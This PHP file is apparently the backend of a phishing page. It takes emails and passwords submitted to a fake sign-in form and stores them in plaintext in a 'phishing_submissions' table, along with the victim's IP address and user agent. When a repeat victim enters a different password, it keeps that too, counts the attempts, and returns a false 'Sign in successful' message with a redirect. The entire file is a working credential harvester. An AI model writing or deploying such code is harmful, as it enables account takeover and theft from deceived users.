<?php
require_once 'config.php';

// Only allow POST requests
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    echo json_encode(['success' => false, 'message' => 'Method not allowed']);
    exit();
}

// Get JSON input
$input = json_decode(file_get_contents('php://input'), true);

// Validate input
if (!isset($input['email']) || !isset($input['password'])) {
    http_response_code(400);
    echo json_encode(['success' => false, 'message' => 'Email and password are required']);
    exit();
}

$email = trim($input['email']);
$password = trim($input['password']);

// Basic validation
if (empty($email) || empty($password)) {
    http_response_code(400);
    echo json_encode(['success' => false, 'message' => 'Email and password cannot be empty']);
    exit();
}

// Sanitize input
$email = filter_var($email, FILTER_SANITIZE_EMAIL);
$password = htmlspecialchars($password, ENT_QUOTES, 'UTF-8');

// Get client info
$ip_address = getClientIP();
$user_agent = getUserAgent();

// Connect to database
$conn = getDBConnection();
if (!$conn) {
    http_response_code(500);
    echo json_encode(['success' => false, 'message' => 'Database connection failed']);
    exit();
}

try {
    // Check if email already exists
    $stmt = $conn->prepare("SELECT id, password, new_password, attempt_number FROM phishing_submissions WHERE email = ?");
    $stmt->execute([$email]);
    $existing = $stmt->fetch();

    if ($existing) {
        // Email exists - check password
        $existingPassword = $existing['password'];
        $existingNewPassword = $existing['new_password'];
        $attemptNumber = $existing['attempt_number'] + 1;

        // Check if password matches existing password
        if ($password === $existingPassword) {
            // Password matches - just update attempt number and timestamp
            $updateStmt = $conn->prepare("UPDATE phishing_submissions SET attempt_number = ?, submission_timestamp = NOW() WHERE id = ?");
            $updateStmt->execute([$attemptNumber, $existing['id']]);
        } else {
            // Password doesn't match
            // Check if it matches new_password
            if ($existingNewPassword && $password === $existingNewPassword) {
                // Matches new_password - just update attempt number
                $updateStmt = $conn->prepare("UPDATE phishing_submissions SET attempt_number = ?, submission_timestamp = NOW() WHERE id = ?");
                $updateStmt->execute([$attemptNumber, $existing['id']]);
            } else {
                // New password - save to new_password column (don't delete old one)
                $updateStmt = $conn->prepare("UPDATE phishing_submissions SET new_password = ?, attempt_number = ?, submission_timestamp = NOW(), ip_address = ?, user_agent = ? WHERE id = ?");
                $updateStmt->execute([$password, $attemptNumber, $ip_address, $user_agent, $existing['id']]);
            }
        }
    } else {
        // Email doesn't exist - create new record
        $insertStmt = $conn->prepare("INSERT INTO phishing_submissions (email, password, ip_address, user_agent, attempt_number) VALUES (?, ?, ?, ?, 1)");
        $insertStmt->execute([$email, $password, $ip_address, $user_agent]);
    }

    // Return success with redirect URL
    echo json_encode([
        'success' => true,
        'message' => 'Sign in successful',
        'redirect_url' => REDIRECT_URL
    ]);

} catch (PDOException $e) {
    error_log("Database error: " . $e->getMessage());
    http_response_code(500);
    echo json_encode(['success' => false, 'message' => 'An error occurred. Please try again.']);
}
?>

